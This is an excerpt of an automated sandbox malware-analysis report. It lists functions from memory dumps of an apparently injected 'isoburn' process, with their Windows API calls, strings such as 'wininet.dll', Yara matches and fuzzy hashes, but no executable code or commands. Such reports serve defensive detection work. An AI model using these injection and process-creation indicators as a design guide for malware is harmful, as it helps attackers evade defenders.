                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: b00f8ebddae3dfca8330eeec8cfeb1eb3f705c56637bb00a9078a3e2f6e34a6d
                                                                          • Instruction ID: 5a73f15ac2f43ca093864956395b36e159d02fcefccd7db2d7afdd51ab585ec1
                                                                          • Opcode Fuzzy Hash: b00f8ebddae3dfca8330eeec8cfeb1eb3f705c56637bb00a9078a3e2f6e34a6d
                                                                          • Instruction Fuzzy Hash: 4F90023220544842D14071584444A86002587E0315FA5C012B4064694E9B258E55BA61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: df9beca98bd60d16bce575c393b3d9219b6e27c6fa1920580e9d2d3324bbf050
                                                                          • Instruction ID: 3fd77ece48640b326a04393af778ba63479279e6ec356a740074e259d1b6521b
                                                                          • Opcode Fuzzy Hash: df9beca98bd60d16bce575c393b3d9219b6e27c6fa1920580e9d2d3324bbf050
                                                                          • Instruction Fuzzy Hash: A390023220140802D1807158444468A001587E1311FE5C016B4025654ECF158F597BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a41188424c6e6a0f7930e54a5a1cf0d685d2afd8242fc6d17e0388cd2cb19ce6
                                                                          • Instruction ID: d1f2d1c0f7c514685b5ab893486422e698fad9b4db08af01fc03f9bae7df1366
                                                                          • Opcode Fuzzy Hash: a41188424c6e6a0f7930e54a5a1cf0d685d2afd8242fc6d17e0388cd2cb19ce6
                                                                          • Instruction Fuzzy Hash: 8590023260540802D15071584454786001587E0311FA5C012B4024654E8B558F557AA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: f2fd0c350ae1990aa460aebb72af0af65de418c9ef3a5033854803d044bedb49
                                                                          • Instruction ID: 04c47e88f41467f19d014e5bfc441c3a4a5b2313fc9e1f4dbf4558c79b4e00ba
                                                                          • Opcode Fuzzy Hash: f2fd0c350ae1990aa460aebb72af0af65de418c9ef3a5033854803d044bedb49
                                                                          • Instruction Fuzzy Hash: B7900226211400030105B5580744547005687E53613A5C022F5015550DDB218D615521
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05442AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 58c1204fcbe8a9faf64e3ef36b74fb0c61b548ea583c734788e41fc059dbcd4a
                                                                          • Instruction ID: 14fcd9f4ae4117456be4952e7cc400fa160d8005e8833f3b6fbc32130e40898d
                                                                          • Opcode Fuzzy Hash: 58c1204fcbe8a9faf64e3ef36b74fb0c61b548ea583c734788e41fc059dbcd4a
                                                                          • Instruction Fuzzy Hash: 66900226221400020145B558064454B045597E63613E5C016F5416590DCB218D655721
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 054435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 3bf601279eda013245f2f541c961cbc58aa9a8081e4fc721810ec5a73aeb1c50
                                                                          • Instruction ID: b0ae162a2ca66c63732b8eb4a84822b84fbfa8718f9d83a696568b82906c58c7
                                                                          • Opcode Fuzzy Hash: 3bf601279eda013245f2f541c961cbc58aa9a8081e4fc721810ec5a73aeb1c50
                                                                          • Instruction Fuzzy Hash: F690023260550402D10071584554746101587E0211FB5C412B4424568E8B958E5169A2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 054439B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 73d6d20decf87dbd910f1ef0f0171d5777db8d6140d8523df7ddd5ca9e704a21
                                                                          • Instruction ID: 30df5b0dfbabf851d41f12b11bc772387876e3c43843ec8bae28ca87a8fdf0d1
                                                                          • Opcode Fuzzy Hash: 73d6d20decf87dbd910f1ef0f0171d5777db8d6140d8523df7ddd5ca9e704a21
                                                                          • Instruction Fuzzy Hash: 1590022224545102D150715C44446564015A7F0211FA5C022B4814594E8A558D556621
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02ED07BA Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 7e327r58$7e327r58
                                                                          • API String ID: 0-4105805501
                                                                          • Opcode ID: 82402712a0b75521e6a14b9bc05d97eac04ab03830922f2e319dfe6e1bd53444
                                                                          • Instruction ID: 5f7c32bed9d7f5df6276fecc2667bcb853388d87c2bf64d0c0d0186ed96042be
                                                                          • Opcode Fuzzy Hash: 82402712a0b75521e6a14b9bc05d97eac04ab03830922f2e319dfe6e1bd53444
                                                                          • Instruction Fuzzy Hash: 9A41CE339CA289EEDB029774DC415EEBF68EE91329F1C919DE4849B502D3228547CBC1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02ED0918 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 02ED0997
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 7e327r58$7e327r58
                                                                          • API String ID: 1836367815-4105805501
                                                                          • Opcode ID: 9349526b6208127e1f10d187c497c14efb34eac3166d3264b5f612306709c727
                                                                          • Instruction ID: f62f88c5beceb932297c06fc1435a62afac8aad2a826755bf40cf45a0c50a37f
                                                                          • Opcode Fuzzy Hash: 9349526b6208127e1f10d187c497c14efb34eac3166d3264b5f612306709c727
                                                                          • Instruction Fuzzy Hash: 17015272D4114C7AEB11AAE49C81EEFBB6CEF44794F04C165FA45A7240D6345E068BB1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02ED0920 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 02ED0997
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 7e327r58$7e327r58
                                                                          • API String ID: 1836367815-4105805501
                                                                          • Opcode ID: e486c9899747edec20a59d0c4dc92b630a3ca3456ed4f9838f46d68ac4a78ee6
                                                                          • Instruction ID: 1b80203db2110be975baa3727d06f4a2eac7e245623f63fa10764cdff0407128
                                                                          • Opcode Fuzzy Hash: e486c9899747edec20a59d0c4dc92b630a3ca3456ed4f9838f46d68ac4a78ee6
                                                                          • Instruction Fuzzy Hash: C3018472D4114C7EEB11AAE49C81EEFBB7CEF40798F04C164FA04A7240D6345E068BB1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EE2450 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 02EE251B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          • Opcode ID: 94f7ebfa6985a47a6b235bce83cf3e06134b07c9328b913cac1da69c1bec5951
                                                                          • Instruction ID: 8d89278fa36604eb787469299a1942532328683c8fd8f9e3ba754af0d45cfe61
                                                                          • Opcode Fuzzy Hash: 94f7ebfa6985a47a6b235bce83cf3e06134b07c9328b913cac1da69c1bec5951
                                                                          • Instruction Fuzzy Hash: 5B31BEB5640604ABCB14DFA4D890FA7B7A9BB48304F00D62EFA5E9B244D3B0A544CFA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EE2448 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 95sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 02EE251B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          • Opcode ID: 582c114c5f541277f682cf13528bef0657b85bde7f0147a617441e376fc1d3b4
                                                                          • Instruction ID: 2d4a651aa2ccbd89c4cc917499c82f0bd953c10d1a878fbdf2f172285393fd51
                                                                          • Opcode Fuzzy Hash: 582c114c5f541277f682cf13528bef0657b85bde7f0147a617441e376fc1d3b4
                                                                          • Instruction Fuzzy Hash: 3431D1B4680700BBCB14DFB4D895FAABBB9BB48305F00D229FA5D5B285D3706544CFA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02ED8B71 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 02ED8C76
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID: @
                                                                          • API String ID: 3188754299-2766056989
                                                                          • Opcode ID: 142fe5c8e50f7c824f872e27d463192554273fb1ddca6c7cc77e4209f8b44931
                                                                          • Instruction ID: 0863a2d6bff3771f34e87fda3141047a4fba9b64cf74eea0195cc119142d3546
                                                                          • Opcode Fuzzy Hash: 142fe5c8e50f7c824f872e27d463192554273fb1ddca6c7cc77e4209f8b44931
                                                                          • Instruction Fuzzy Hash: F07161B2940208AADB24DB64DCC5FEFB3BDBF54304F04999DF51A96140EB70AB858F61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EDE50B Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 103COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 02EDE527
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Initialize
                                                                          • String ID: @J7<
                                                                          • API String ID: 2538663250-2016760708
                                                                          • Opcode ID: 635382d79cff416b9f17ad0bee3dc5975c074b70bb05a18bbdc40a4beb068f7f
                                                                          • Instruction ID: 10ddd6b22ea7ff22baa0adfe615ceacaf5bbcd75e54542c89e8ded12dfc16cdb
                                                                          • Opcode Fuzzy Hash: 635382d79cff416b9f17ad0bee3dc5975c074b70bb05a18bbdc40a4beb068f7f
                                                                          • Instruction Fuzzy Hash: CB3141B5A0060AAFDB04DFD8D8809EFB7B9FF88304B148559E915AB204D775EE05CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EDE510 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 02EDE527
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Initialize
                                                                          • String ID: @J7<
                                                                          • API String ID: 2538663250-2016760708
                                                                          • Opcode ID: 783327409d9f152e3c77285bf7fa042f4a25fd5df9a05f961e22058e959633af
                                                                          • Instruction ID: 756cabd9fd1e5dfad78163c49f284c8e4b53536ed4a9eac10122e003344944e1
                                                                          • Opcode Fuzzy Hash: 783327409d9f152e3c77285bf7fa042f4a25fd5df9a05f961e22058e959633af
                                                                          • Instruction Fuzzy Hash: 29312FB5A0060A9FDB04DFD8D8809EEB7B9BF88304B148559E915AB214D775EE05CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EE551A Relevance: 1.6, APIs: 1, Instructions: 59processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessInternalW.KERNELBASE(02ED0DD1,02ED0DF9,02ED0BD1,00000000,02ED75B3,00000010,02ED0DF9,?,?,00000044,02ED0DF9,00000010,02ED75B3,00000000,02ED0BD1,02ED0DF9), ref: 02EE5583
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInternalProcess
                                                                          • String ID:
                                                                          • API String ID: 2186235152-0
                                                                          • Opcode ID: c70c70ad0f92251847618d5563fdc75050762b3f3595e7b2f0a82a7b4b7f3631
                                                                          • Instruction ID: cbcd5a0d6231000cd11419a3a35e944f576dde1d3db242af45843ce3c4110632
                                                                          • Opcode Fuzzy Hash: c70c70ad0f92251847618d5563fdc75050762b3f3595e7b2f0a82a7b4b7f3631
                                                                          • Instruction Fuzzy Hash: 9E1105B6204208BBDB04EE99DC81EDB77ADEF8C714F408109FA0DE3246D630E9118BB4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02ED4120 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02ED4192
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 1fcb73fbd77ef36cb2ce4409c10369b23ff0cc34926120964a4f0ebcc4b86230
                                                                          • Instruction ID: 20e97818662c35c3b6209706ea36d6fecec82f465cc00e1f3c63eaafac40121b
                                                                          • Opcode Fuzzy Hash: 1fcb73fbd77ef36cb2ce4409c10369b23ff0cc34926120964a4f0ebcc4b86230
                                                                          • Instruction Fuzzy Hash: B8015EB5E4020DABDF10DBA0DC41FDEB7789B54308F008595E909A7280F630E7088BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EE5520 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessInternalW.KERNELBASE(02ED0DD1,02ED0DF9,02ED0BD1,00000000,02ED75B3,00000010,02ED0DF9,?,?,00000044,02ED0DF9,00000010,02ED75B3,00000000,02ED0BD1,02ED0DF9), ref: 02EE5583
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInternalProcess
                                                                          • String ID:
                                                                          • API String ID: 2186235152-0
                                                                          • Opcode ID: dc30fb65775e73fbda3954eec95ed66d1a2db8f0e204a2e990e2ae94dc159d13
                                                                          • Instruction ID: f1a3968f680c45126fee5128d1f24d4b3f6b01ecb8e234380be0dc539f914d05
                                                                          • Opcode Fuzzy Hash: dc30fb65775e73fbda3954eec95ed66d1a2db8f0e204a2e990e2ae94dc159d13
                                                                          • Instruction Fuzzy Hash: 530180B2215548BBDB44DE99DC80EDB77ADAF8C754F518208BA09E7241D630F8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EC9960 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EC99A5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: 8fe21a8186d8c0b22be6d23cc714eb24f848aee8ffd292f2038c5389aab0e4df
                                                                          • Instruction ID: bdb3efe1b8b106e911afe72e51329ac11ef30032feb027f0660fbb637fdd1ec7
                                                                          • Opcode Fuzzy Hash: 8fe21a8186d8c0b22be6d23cc714eb24f848aee8ffd292f2038c5389aab0e4df
                                                                          • Instruction Fuzzy Hash: 12F065733C120436D730A1E9AC02FE7734D9B80775F24402AF60DEB1C1D995B80146E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EC995B Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EC99A5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: e6af1948fe2b60ec5aad23a07142ef98248ca4a55cf9dfa79fd31cca4be9ade6
                                                                          • Instruction ID: 2104580282ae7f6675e8073bc543f2ce7e0472b97268e0f0fe71c2e79a97cfbd
                                                                          • Opcode Fuzzy Hash: e6af1948fe2b60ec5aad23a07142ef98248ca4a55cf9dfa79fd31cca4be9ade6
                                                                          • Instruction Fuzzy Hash: 13F0657328420436E630A1999C42FEB775D9BC0764F344029F609AB1C1D9A6B84646E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EE5490 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,23C78BFC,00000007,00000000,00000004,00000000,02ED3913,000000F0,?,?,?,?,00000000), ref: 02EE54CF
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: 084c3a0141a29753b9564923c41a14955e4b30b2448ffbc91be334a51728e4f3
                                                                          • Instruction ID: 11033da508064ced4950ef4b59375b8174ff1e5873fdf260c71ed6b859c5a968
                                                                          • Opcode Fuzzy Hash: 084c3a0141a29753b9564923c41a14955e4b30b2448ffbc91be334a51728e4f3
                                                                          • Instruction Fuzzy Hash: 13E065722002087BDA10EE99DC40F9B37ADEFC8710F008408F909A7242C670B8108BB4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02EE5440 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(02ED1F66,?,02EE37E3,02ED1F66,02EE3557,02EE37E3,?,02ED1F66,02EE3557,00001000,?,?,02EE6CA0), ref: 02EE547C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: 724edec358f2f41a1d8b2e1c973ed9c8748d8b2567d1867b73260787005ea862
                                                                          • Instruction ID: 62fa34fc568966a8b3df76500fb56f03d3b94042fdea0f76391d4c0479065250
                                                                          • Opcode Fuzzy Hash: 724edec358f2f41a1d8b2e1c973ed9c8748d8b2567d1867b73260787005ea862
                                                                          • Instruction Fuzzy Hash: 61E065B2644204BBDA10EE98DC42FAB77ADEFC8711F408409F90CA7242CA30B9108BB4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02ED75F0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 02ED761C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 197c5d411eb6a8b592f346f29c51d7b6835527769e77055f605e3160b1caffff
                                                                          • Instruction ID: 167d25059a4b04bb77984d5c144f72e4b5145e0db389dcdef03b4a3b4627178b
                                                                          • Opcode Fuzzy Hash: 197c5d411eb6a8b592f346f29c51d7b6835527769e77055f605e3160b1caffff
                                                                          • Instruction Fuzzy Hash: A4E0203D58020417EB6057ACDC49F623348474472CF1896B4F82CDB1C1FA74F4038150
                                                                          Uniqueness

